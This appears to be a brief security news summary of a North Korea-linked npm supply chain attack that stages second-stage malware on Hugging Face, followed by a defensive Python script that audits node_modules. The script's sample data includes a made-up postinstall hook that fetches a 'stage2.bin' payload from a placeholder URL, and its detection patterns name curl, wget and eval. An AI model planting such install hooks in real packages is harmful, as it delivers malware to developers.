Hugging Face Hiding Second-Stage Malware for npm Supply Chain Attack

Hackers linked to North Korea have exploited the Hugging Face platform by hosting second-stage malware on it, turning it into a channel for malware delivery and data exfiltration. This npm supply chain attack targets software developers worldwide and begins with a deceptive npm package named 'terminal-logger-utils', which poses as a standard development tool.
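As an added example (not code from the article or from the reporting team), a defender-side audit that walks a project's node_modules for the package name reported above and for install-time hooks that reach out to huggingface.co. That the first stage runs from an npm lifecycle hook is an assumption: the article does not state the fetch mechanism.

```python
import json
import re
from pathlib import Path
# Assumption, not a detail from the article: the first stage is modelled as an
# npm lifecycle hook that pulls its second stage from huggingface.co.
WATCHED_HOSTS = {"huggingface.co"}
KNOWN_BAD_PACKAGES = {"terminal-logger-utils"}  # package name from the article
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
EXEC_RE = re.compile(r"\b(curl|wget|eval|node -e)\b")

def audit_package_json(data: dict) -> list:
    """Return (reason, detail) findings for one parsed package.json."""
    findings = []
    name = data.get("name", "")
    if name in KNOWN_BAD_PACKAGES:
        findings.append(("known-bad-package", name))
    scripts = data.get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        # A lifecycle hook contacting a watched host is the staging pattern reported.
        for host in URL_RE.findall(cmd):
            if host in WATCHED_HOSTS:
                findings.append((f"{hook}-contacts-{host}", cmd))
        # Any hook that downloads or evaluates content at install time deserves review.
        if EXEC_RE.search(cmd):
            findings.append((f"{hook}-downloads-or-evals", cmd))
    return findings

def audit_node_modules(root: Path) -> dict:
    """Map package name -> findings for every package.json under root."""
    report = {}
    for pj in root.rglob("package.json"):
        try:
            data = json.loads(pj.read_text())
        except (OSError, ValueError):
            continue  # unreadable or non-JSON manifest: skip, do not crash the audit
        hits = audit_package_json(data)
        if hits:
            report[data.get("name", str(pj))] = hits
    return report

# Constructed sample manifests: one benign, one mimicking the reported pattern (placeholder URL).
SAMPLE_PACKAGES = [
    {"name": "left-pad", "scripts": {"test": "jest"}},
    {"name": "terminal-logger-utils", "scripts": {"postinstall":
        "node -e \"fetch('https://huggingface.co/EXAMPLE-ORG/EXAMPLE-REPO/resolve/main/stage2.bin')\""}},
]
```

Run `audit_node_modules(Path("node_modules"))` inside a project to get a dict of only the packages that produced findings.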
Primary source: cybersecuritynews.com (article by CyberSIXT)